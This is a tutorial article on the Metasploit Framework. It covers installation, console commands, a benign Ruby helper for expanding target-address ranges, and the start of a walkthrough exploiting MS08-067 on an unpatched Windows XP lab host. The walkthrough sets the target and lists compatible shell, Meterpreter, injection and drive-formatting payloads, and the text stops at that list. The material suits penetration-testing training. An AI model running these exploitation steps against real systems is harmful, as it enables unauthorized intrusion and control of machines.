A crash course on the Metasploit Framework

Metasploit is a widely used penetration testing framework that makes exploitation far easier than hand-crafting every attack. It has become an indispensable tool for both red teams and blue teams.

In this article you will learn how to use Metasploit, a penetration-testing platform for developing, testing and launching exploits.



The Metasploit Framework (MSF) is a solid foundation that you can build on for penetration testing, and you can customize it to your needs. The ethical-hacking community regards it as one of the most complete collections of public exploits, and the Kali Linux maintainers consider Metasploit one of the most useful security auditing tools freely available to security professionals. H.D. Moore released the first version in 2003 as a Perl tool; it was later completely rewritten in Ruby, and Rapid7 acquired the project in 2009.

Metasploit gives you a complete working environment: web vulnerability plugins, network information gathering, an extensive exploit development environment and commercial-grade exploits. You will hardly find a tool that matches it.


Getting Metasploit


Metasploit on Linux

Metasploit Framework comes preinstalled in Kali Linux.

To launch Metasploit on a Kali Linux machine, navigate to Application Menu > Exploitation Tools > Metasploit-Framework. The menu entry runs the command shown below: msfdb init sets up the PostgreSQL database that msfconsole uses to store hosts, services and loot (it is skipped if the database is already configured), and then the console starts.

> Executing “sudo msfdb init && msfconsole”
[sudo] password for mrdev: 
[+] Starting database
[i] The database appears to be already configured, skipping initialization
                                                  
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+


       =[ metasploit v6.0.30-dev                          ]
+ -- --=[ 2099 exploits - 1129 auxiliary - 357 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Enable verbose logging with set VERBOSE true

msf6 > 


Installing Metasploit on Windows

Metasploit Framework can also be installed on Windows. However, Windows is usually not the platform of choice for deploying it, because many of the supporting tools and utilities are not available for Windows. It is therefore strongly recommended to install the Metasploit Framework on Linux.

The following are the steps for installing the Metasploit Framework on Windows:

1. Download the latest Metasploit Framework Windows installer from GitHub.
2. Now run the downloaded file:


3. Accept the license agreement:

4. Select the location where you wish to install the Metasploit Framework:


5. Click on Install to proceed. The installer copies the required files to the destination folder:


6. Click on Finish to complete the Metasploit Framework installation.



Now that the installation is complete, let's access the Metasploit Framework from the command line:

1. Navigate to C:\metasploit-framework\bin.


2. Open a command prompt at this path, type msfconsole.bat, and press Enter:

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\metasploit-framework\bin> msfconsole.bat

You should be able to see the following:

I recommend not installing Metasploit on Windows: it consumes a large amount of memory there.


Using the Metasploit Console to Launch Exploits

Our first Metasploit demo exploits MS08-067, the Windows Server service vulnerability that the Conficker worm used to spread in late 2008 and early 2009. We'll use Metasploit to get a remote command shell on an unpatched Windows XP machine. Metasploit can pair an exploit with any payload that is compatible with it, so with the same MS08-067 exploit we can open a command shell, create an administrator account, start a remote VNC session, or do a number of other things discussed later. So let's get started.


Why Windows XP?

Windows XP is end-of-life and contains many well-documented, never-patched vulnerabilities, so it gives us far more attacks to practise than a current, patched Windows release would.

1. To launch the Metasploit console, type the following command:

mrdev@kali:~$ msfconsole
The commands to start with are (msfconsole commands are lowercase):

show <exploits | payloads>
info <module-name>
use <module-name>

 

2. You’ll find all the other commands by typing “help” or “?”.

msf6 > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    debug         Display information useful for debugging
    exit          Exit the console
    features      Display the list of not yet released features that can be opted in to
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    grep          Grep the output of another command
    help          Help menu
    history       Show command history
    load          Load a framework plugin
    quit          Exit the console
    repeat        Repeat a list of commands
    route         Route traffic through a session
    save          Saves the active datastores
    sessions      Dump session listings and display information about sessions
    set           Sets a context-specific variable to a value
    setg          Sets a global variable to a value
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    tips          Show a list of useful productivity tips
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    version       Show the framework and console library version numbers


Module Commands
===============

    Command       Description
    -------       -----------
    advanced      Displays advanced options for one or more modules
    back          Move back from the current context
    clearm        Clear the module stack
    info          Displays information about one or more modules
    listm         List the module stack
    loadpath      Searches for and loads modules from a path
    options       Displays global options or for one or more modules
    popm          Pops the latest module off the stack and makes it active
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    reload_all    Reloads all modules from all defined module paths
    search        Searches module names and descriptions
    show          Displays modules of a given type, or all modules
    use           Interact with a module by name or search term/index


Job Commands
============

    Command       Description
    -------       -----------
    handler       Start a payload handler as job
    jobs          Displays and manages jobs
    kill          Kill a job
    rename_job    Rename a job


Resource Script Commands
========================

    Command       Description
    -------       -----------
    makerc        Save commands entered since start to a file
    resource      Run the commands stored in a file


Database Backend Commands
=========================

    Command           Description
    -------           -----------
    analyze           Analyze database information about a specific address or address range
    db_connect        Connect to an existing data service
    db_disconnect     Disconnect from the current data service
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
    db_remove         Remove the saved data service entry
    db_save           Save the current data service connection as the default to reconnect on startup
    db_status         Show the current data service status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces


Credentials Backend Commands
============================

    Command       Description
    -------       -----------
    creds         List all credentials in the database


Developer Commands
==================

    Command       Description
    -------       -----------
    edit          Edit the current module or a file with the preferred editor
    irb           Open an interactive Ruby shell in the current context
    log           Display framework.log paged to the end if possible
    pry           Open the Pry debugger on the current module or Framework
    reload_lib    Reload Ruby library files from specified paths


msfconsole
==========

`msfconsole` is the primary interface to Metasploit Framework. There is quite a
lot that needs go here, please be patient and keep an eye on this space!

Building ranges and lists
-------------------------

Many commands and options that take a list of things can use ranges to avoid
having to manually list each desired thing. All ranges are inclusive.

### Ranges of IDs

Commands that take a list of IDs can use ranges to help. Individual IDs must be
separated by a `,` (no space allowed) and ranges can be expressed with either
`-` or `..`.

### Ranges of IPs

There are several ways to specify ranges of IP addresses that can be mixed
together. The first way is a list of IPs separated by just a ` ` (ASCII space),
with an optional `,`. The next way is two complete IP addresses in the form of
`BEGINNING_ADDRESS-END_ADDRESS` like `127.0.1.44-127.0.2.33`. CIDR
specifications may also be used, however the whole address must be given to
Metasploit like `127.0.0.0/8` and not `127/8`, contrary to the RFC.
Additionally, a netmask can be used in conjunction with a domain name to
dynamically resolve which block to target. All these methods work for both IPv4
and IPv6 addresses. IPv4 addresses can also be specified with special octet
ranges from the [NMAP target
specification](https://nmap.org/book/man-target-specification.html)

### Examples

Terminate the first sessions:

    sessions -k 1

Stop some extra running jobs:

    jobs -k 2-6,7,8,11..15

Check a set of IP addresses:

    check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255

Target a set of IPv6 hosts:

    set RHOSTS fe80::3990:0000/110, ::1-::f0f0

Target a block from a resolved domain name:

    set RHOSTS www.example.test/24
msf6 > 
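The range syntax described in the help text above is easy to get wrong on a real engagement (a stray comma turns `127.0.0-2.1-4,15` into a different target set), so it is worth having as code. The following Ruby module is an added example written for this article, not Metasploit's own implementation (which lives in Rex::Socket::RangeWalker). It expands the ID notation (`2-6,7,8,11..15`), nmap-style octet ranges (`127.0.0-2.1-4,15`), BEGIN-END address pairs for IPv4 and IPv6, and CIDR blocks into explicit lists, and it splits an RHOSTS string on a space with an optional trailing comma exactly as the help text describes. Hostname-plus-netmask targets such as `www.example.test/24` are rejected rather than resolved, so the code runs offline; the sample inputs are the ones from the help text.

```ruby
require 'ipaddr'

# Added example: expands the msfconsole range notations described above.
# Not Metasploit's own code; hostname/netmask targets are rejected so it runs offline.
module MsfRanges
  module_function

  # ID lists for commands such as `jobs -k` and `sessions -k`:
  # "2-6,7,8,11..15" -> [2, 3, 4, 5, 6, 7, 8, 11, 12, 13, 14, 15]
  def expand_ids(spec)
    spec.split(',').flat_map do |part|
      if (m = part.match(/\A(\d+)(?:-|\.\.)(\d+)\z/))
        (m[1].to_i..m[2].to_i).to_a
      elsif part.match?(/\A\d+\z/)
        [part.to_i]
      else
        raise ArgumentError, "bad ID spec: #{part.inspect}"
      end
    end.uniq
  end

  # One nmap-style octet: "3" -> [3], "0-2" -> [0, 1, 2], "1-4,15" -> [1, 2, 3, 4, 15]
  def expand_octet(octet)
    values = octet.split(',').flat_map do |piece|
      if (m = piece.match(/\A(\d+)-(\d+)\z/))
        (m[1].to_i..m[2].to_i).to_a
      elsif piece.match?(/\A\d+\z/)
        [piece.to_i]
      else
        raise ArgumentError, "bad octet: #{piece.inspect}"
      end
    end
    raise ArgumentError, "octet outside 0..255: #{octet}" unless values.all? { |v| v.between?(0, 255) }
    values.uniq
  end

  # "127.0.0-2.1-4,15" -> every combination of the four octet sets (3 * 5 = 15 hosts)
  def expand_octet_ranges(spec)
    octets = spec.split('.', -1)
    raise ArgumentError, "expected four octets: #{spec}" unless octets.size == 4
    a, b, c, d = octets.map { |o| expand_octet(o) }
    a.product(b, c, d).map { |quad| quad.join('.') }
  end

  # True when IPAddr accepts the string as a complete IPv4 or IPv6 address.
  def full_address?(str)
    IPAddr.new(str)
    true
  rescue IPAddr::Error
    false
  end

  # One RHOSTS token -> Array of address strings.
  def expand_token(token)
    if token.include?('/')                                   # CIDR: the whole address is required
      base, = token.split('/', 2)
      unless full_address?(base)
        raise ArgumentError, "give the whole address (127.0.0.0/8, not 127/8) and no hostnames: #{token}"
      end
      IPAddr.new(token).to_range.map(&:to_s)
    elsif (m = token.match(/\A(.+)-(.+)\z/)) && full_address?(m[1]) && full_address?(m[2])
      lo, hi = IPAddr.new(m[1]), IPAddr.new(m[2])            # BEGIN-END pair, IPv4 or IPv6
      raise ArgumentError, "mixed address families: #{token}" unless lo.family == hi.family
      (lo.to_i..hi.to_i).map { |i| IPAddr.new(i, lo.family).to_s }
    elsif token.match?(/\A[\d.,-]+\z/)                       # nmap octet ranges or a plain IPv4 host
      expand_octet_ranges(token)
    else                                                     # a plain IPv6 host such as ::1
      [IPAddr.new(token).to_s]
    end
  end

  # Whole RHOSTS / check argument. Tokens are separated by a space with an optional
  # trailing comma, so "a/30, 127.0.0-2.1-4,15 127.0.0.255" has three tokens and the
  # comma inside the second one stays part of the octet list.
  def expand_rhosts(spec)
    spec.split(', ').flat_map { |chunk| chunk.split(' ') }
        .map { |tok| tok.chomp(',') }
        .flat_map { |tok| expand_token(tok) }
        .uniq
  end
end

if $PROGRAM_NAME == __FILE__
  p MsfRanges.expand_ids('2-6,7,8,11..15')
  p MsfRanges.expand_rhosts('10.0.0.0/30, 127.0.0-2.1-4,15 127.0.0.255').size
end
```

Before pointing a check or an exploit at a large RHOSTS expression, running it through a function like expand_rhosts and looking at the count (or the first and last few entries) is a cheap way to confirm the expression covers exactly the hosts you are authorized to touch.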


3. To launch the MS08-067 exploit, we first need to find its Metasploit module name. We can use the search command to do so (search also accepts keyword filters such as type:exploit platform:windows to narrow long result lists):

msf6 > search ms08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

4. The Metasploit name for this exploit is exploit/windows/smb/ms08_067_netapi (note the underscores; module names never contain hyphens, so ms08-067_netapi would not be found). We'll use this exploit and then look for all the options needed to make it work.

msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > 

Notice that the prompt changes to show the active module when you use an exploit module. The console also tells you that, because no payload was chosen, it defaulted to windows/meterpreter/reverse_tcp; we'll change that in step 7. Any options you set while configuring this exploit are kept in the module's datastore, so you don't have to set them again every time you run it. You can return to the main console prompt with the back command.

5. Different exploits have different options. Let’s see what options need to be set to make the MS08-067 exploit work:

msf6 exploit(windows/smb/ms08_067_netapi) > back
msf6 > use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > show options

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.43.71    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf6 exploit( windows/smb/ms08_067_netapi ) > 

6. This exploit requires a target address (RHOSTS), the port on which SMB (Server Message Block) listens (RPORT, 445 by default), and the name of the pipe exposing the vulnerable function (SMBPIPE, BROWSER by default). Only RHOSTS has no default, so it is the one we must set:

set RHOSTS <the target IP address>

msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.43.240
RHOSTS => 192.168.43.240

As you can see, the syntax to set an option is as follows:

set <OPTION-NAME> <value>

Note: Earlier versions of Metasploit were particular about the case of option names and values, so the examples in this article always use uppercase where the option is listed in uppercase.

7. With the exploit module selected, we next choose the payload. The payload is the code that runs on the target after the vulnerability is triggered: it is how you choose to interact with the compromised machine if exploitation succeeds. The exploit defaulted to windows/meterpreter/reverse_tcp (see the payload options in the show options output above), but for this first example let's use a simpler payload that opens a command shell listening on a TCP port. Use show payloads to list only the payloads compatible with this exploit. In the list, names with a slash such as windows/shell/bind_tcp are staged payloads (their description says "Stager": a small first stage fetches the rest over the connection), while names such as windows/shell_bind_tcp are "Inline", self-contained payloads.

msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.43.240
RHOSTS => 192.168.43.240
msf6 exploit(windows/smb/ms08_067_netapi) > show payloads

Compatible Payloads
===================

   #    Name                                                Disclosure Date  Rank    Check  Description
   -    ----                                                ---------------  ----    -----  -----------
   0    generic/custom                                                       normal  No     Custom Payload
   1    generic/debug_trap                                                   normal  No     Generic x86 Debug Trap
   2    generic/shell_bind_tcp                                               normal  No     Generic Command Shell, Bind TCP Inline
   3    generic/shell_reverse_tcp                                            normal  No     Generic Command Shell, Reverse TCP Inline
   4    generic/tight_loop                                                   normal  No     Generic x86 Tight Loop
   5    windows/adduser                                                      normal  No     Windows Execute net user /ADD
   6    windows/dllinject/bind_hidden_ipknock_tcp                            normal  No     Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
   7    windows/dllinject/bind_hidden_tcp                                    normal  No     Reflective DLL Injection, Hidden Bind TCP Stager
   8    windows/dllinject/bind_ipv6_tcp                                      normal  No     Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
   9    windows/dllinject/bind_ipv6_tcp_uuid                                 normal  No     Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   10   windows/dllinject/bind_named_pipe                                    normal  No     Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
   11   windows/dllinject/bind_nonx_tcp                                      normal  No     Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   12   windows/dllinject/bind_tcp                                           normal  No     Reflective DLL Injection, Bind TCP Stager (Windows x86)
   13   windows/dllinject/bind_tcp_uuid                                      normal  No     Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
   14   windows/dllinject/reverse_hop_http                                   normal  No     Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
   15   windows/dllinject/reverse_ipv6_tcp                                   normal  No     Reflective DLL Injection, Reverse TCP Stager (IPv6)
   16   windows/dllinject/reverse_nonx_tcp                                   normal  No     Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   17   windows/dllinject/reverse_ord_tcp                                    normal  No     Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   18   windows/dllinject/reverse_tcp                                        normal  No     Reflective DLL Injection, Reverse TCP Stager
   19   windows/dllinject/reverse_tcp_allports                               normal  No     Reflective DLL Injection, Reverse All-Port TCP Stager
   20   windows/dllinject/reverse_tcp_dns                                    normal  No     Reflective DLL Injection, Reverse TCP Stager (DNS)
   21   windows/dllinject/reverse_tcp_uuid                                   normal  No     Reflective DLL Injection, Reverse TCP Stager with UUID Support
   22   windows/dns_txt_query_exec                                           normal  No     DNS TXT Record Payload Download and Execution
   23   windows/exec                                                         normal  No     Windows Execute Command
   24   windows/format_all_drives                                            manual  No     Windows Drive Formatter
   25   windows/loadlibrary                                                  normal  No     Windows LoadLibrary Path
   26   windows/messagebox                                                   normal  No     Windows MessageBox
   27   windows/meterpreter/bind_hidden_ipknock_tcp                          normal  No     Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
   28   windows/meterpreter/bind_hidden_tcp                                  normal  No     Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
   29   windows/meterpreter/bind_ipv6_tcp                                    normal  No     Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   30   windows/meterpreter/bind_ipv6_tcp_uuid                               normal  No     Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   31   windows/meterpreter/bind_named_pipe                                  normal  No     Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
   32   windows/meterpreter/bind_nonx_tcp                                    normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   33   windows/meterpreter/bind_tcp                                         normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
   34   windows/meterpreter/bind_tcp_uuid                                    normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   35   windows/meterpreter/reverse_hop_http                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   36   windows/meterpreter/reverse_https_proxy                              normal  No     Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
   37   windows/meterpreter/reverse_ipv6_tcp                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   38   windows/meterpreter/reverse_named_pipe                               normal  No     Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
   39   windows/meterpreter/reverse_nonx_tcp                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   40   windows/meterpreter/reverse_ord_tcp                                  normal  No     Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   41   windows/meterpreter/reverse_tcp                                      normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   42   windows/meterpreter/reverse_tcp_allports                             normal  No     Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   43   windows/meterpreter/reverse_tcp_dns                                  normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   44   windows/meterpreter/reverse_tcp_uuid                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
   45   windows/metsvc_bind_tcp                                              normal  No     Windows Meterpreter Service, Bind TCP
   46   windows/metsvc_reverse_tcp                                           normal  No     Windows Meterpreter Service, Reverse TCP Inline
   47   windows/patchupdllinject/bind_hidden_ipknock_tcp                     normal  No     Windows Inject DLL, Hidden Bind Ipknock TCP Stager
   48   windows/patchupdllinject/bind_hidden_tcp                             normal  No     Windows Inject DLL, Hidden Bind TCP Stager
   49   windows/patchupdllinject/bind_ipv6_tcp                               normal  No     Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
   50   windows/patchupdllinject/bind_ipv6_tcp_uuid                          normal  No     Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   51   windows/patchupdllinject/bind_named_pipe                             normal  No     Windows Inject DLL, Windows x86 Bind Named Pipe Stager
   52   windows/patchupdllinject/bind_nonx_tcp                               normal  No     Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   53   windows/patchupdllinject/bind_tcp                                    normal  No     Windows Inject DLL, Bind TCP Stager (Windows x86)
   54   windows/patchupdllinject/bind_tcp_uuid                               normal  No     Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
   55   windows/patchupdllinject/reverse_ipv6_tcp                            normal  No     Windows Inject DLL, Reverse TCP Stager (IPv6)
   56   windows/patchupdllinject/reverse_nonx_tcp                            normal  No     Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   57   windows/patchupdllinject/reverse_ord_tcp                             normal  No     Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   58   windows/patchupdllinject/reverse_tcp                                 normal  No     Windows Inject DLL, Reverse TCP Stager
   59   windows/patchupdllinject/reverse_tcp_allports                        normal  No     Windows Inject DLL, Reverse All-Port TCP Stager
   60   windows/patchupdllinject/reverse_tcp_dns                             normal  No     Windows Inject DLL, Reverse TCP Stager (DNS)
   61   windows/patchupdllinject/reverse_tcp_uuid                            normal  No     Windows Inject DLL, Reverse TCP Stager with UUID Support
   62   windows/patchupmeterpreter/bind_hidden_ipknock_tcp                   normal  No     Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
   63   windows/patchupmeterpreter/bind_hidden_tcp                           normal  No     Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
   64   windows/patchupmeterpreter/bind_ipv6_tcp                             normal  No     Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
   65   windows/patchupmeterpreter/bind_ipv6_tcp_uuid                        normal  No     Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   66   windows/patchupmeterpreter/bind_named_pipe                           normal  No     Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
   67   windows/patchupmeterpreter/bind_nonx_tcp                             normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
   68   windows/patchupmeterpreter/bind_tcp                                  normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
   69   windows/patchupmeterpreter/bind_tcp_uuid                             normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
   70   windows/patchupmeterpreter/reverse_ipv6_tcp                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
   71   windows/patchupmeterpreter/reverse_nonx_tcp                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   72   windows/patchupmeterpreter/reverse_ord_tcp                           normal  No     Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   73   windows/patchupmeterpreter/reverse_tcp                               normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
   74   windows/patchupmeterpreter/reverse_tcp_allports                      normal  No     Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
   75   windows/patchupmeterpreter/reverse_tcp_dns                           normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
   76   windows/patchupmeterpreter/reverse_tcp_uuid                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
   77   windows/peinject/bind_hidden_ipknock_tcp                             normal  No     Windows Inject PE Files, Hidden Bind Ipknock TCP Stager
   78   windows/peinject/bind_hidden_tcp                                     normal  No     Windows Inject PE Files, Hidden Bind TCP Stager
   79   windows/peinject/bind_ipv6_tcp                                       normal  No     Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)
   80   windows/peinject/bind_ipv6_tcp_uuid                                  normal  No     Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   81   windows/peinject/bind_named_pipe                                     normal  No     Windows Inject PE Files, Windows x86 Bind Named Pipe Stager
   82   windows/peinject/bind_nonx_tcp                                       normal  No     Windows Inject PE Files, Bind TCP Stager (No NX or Win7)
   83   windows/peinject/bind_tcp                                            normal  No     Windows Inject PE Files, Bind TCP Stager (Windows x86)
   84   windows/peinject/bind_tcp_uuid                                       normal  No     Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)
   85   windows/peinject/reverse_ipv6_tcp                                    normal  No     Windows Inject PE Files, Reverse TCP Stager (IPv6)
   86   windows/peinject/reverse_named_pipe                                  normal  No     Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager
   87   windows/peinject/reverse_nonx_tcp                                    normal  No     Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
   88   windows/peinject/reverse_ord_tcp                                     normal  No     Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
   89   windows/peinject/reverse_tcp                                         normal  No     Windows Inject PE Files, Reverse TCP Stager
   90   windows/peinject/reverse_tcp_allports                                normal  No     Windows Inject PE Files, Reverse All-Port TCP Stager
   91   windows/peinject/reverse_tcp_dns                                     normal  No     Windows Inject PE Files, Reverse TCP Stager (DNS)
   92   windows/peinject/reverse_tcp_uuid                                    normal  No     Windows Inject PE Files, Reverse TCP Stager with UUID Support
   93   windows/pingback_bind_tcp                                            normal  No     Windows x86 Pingback, Bind TCP Inline
   94   windows/pingback_reverse_tcp                                         normal  No     Windows x86 Pingback, Reverse TCP Inline
   95   windows/shell/bind_hidden_ipknock_tcp                                normal  No     Windows Command Shell, Hidden Bind Ipknock TCP Stager
   96   windows/shell/bind_hidden_tcp                                        normal  No     Windows Command Shell, Hidden Bind TCP Stager
   97   windows/shell/bind_ipv6_tcp                                          normal  No     Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
   98   windows/shell/bind_ipv6_tcp_uuid                                     normal  No     Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   99   windows/shell/bind_named_pipe                                        normal  No     Windows Command Shell, Windows x86 Bind Named Pipe Stager
   100  windows/shell/bind_nonx_tcp                                          normal  No     Windows Command Shell, Bind TCP Stager (No NX or Win7)
   101  windows/shell/bind_tcp                                               normal  No     Windows Command Shell, Bind TCP Stager (Windows x86)
   102  windows/shell/bind_tcp_uuid                                          normal  No     Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
   103  windows/shell/reverse_ipv6_tcp                                       normal  No     Windows Command Shell, Reverse TCP Stager (IPv6)
   104  windows/shell/reverse_nonx_tcp                                       normal  No     Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   105  windows/shell/reverse_ord_tcp                                        normal  No     Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   106  windows/shell/reverse_tcp                                            normal  No     Windows Command Shell, Reverse TCP Stager
   107  windows/shell/reverse_tcp_allports                                   normal  No     Windows Command Shell, Reverse All-Port TCP Stager
   108  windows/shell/reverse_tcp_dns                                        normal  No     Windows Command Shell, Reverse TCP Stager (DNS)
   109  windows/shell/reverse_tcp_uuid                                       normal  No     Windows Command Shell, Reverse TCP Stager with UUID Support
   110  windows/shell/reverse_udp                                            normal  No     Windows Command Shell, Reverse UDP Stager with UUID Support
   111  windows/shell_bind_tcp                                               normal  No     Windows Command Shell, Bind TCP Inline
   112  windows/shell_hidden_bind_tcp                                        normal  No     Windows Command Shell, Hidden Bind TCP Inline
   113  windows/shell_reverse_tcp                                            normal  No     Windows Command Shell, Reverse TCP Inline
   114  windows/speak_pwned                                                  normal  No     Windows Speech API - Say "You Got Pwned!"
   115  windows/upexec/bind_hidden_ipknock_tcp                               normal  No     Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
   116  windows/upexec/bind_hidden_tcp                                       normal  No     Windows Upload/Execute, Hidden Bind TCP Stager
   117  windows/upexec/bind_ipv6_tcp                                         normal  No     Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
   118  windows/upexec/bind_ipv6_tcp_uuid                                    normal  No     Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   119  windows/upexec/bind_named_pipe                                       normal  No     Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
   120  windows/upexec/bind_nonx_tcp                                         normal  No     Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   121  windows/upexec/bind_tcp                                              normal  No     Windows Upload/Execute, Bind TCP Stager (Windows x86)
   122  windows/upexec/bind_tcp_uuid                                         normal  No     Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
   123  windows/upexec/reverse_ipv6_tcp                                      normal  No     Windows Upload/Execute, Reverse TCP Stager (IPv6)
   124  windows/upexec/reverse_nonx_tcp                                      normal  No     Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   125  windows/upexec/reverse_ord_tcp                                       normal  No     Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   126  windows/upexec/reverse_tcp                                           normal  No     Windows Upload/Execute, Reverse TCP Stager
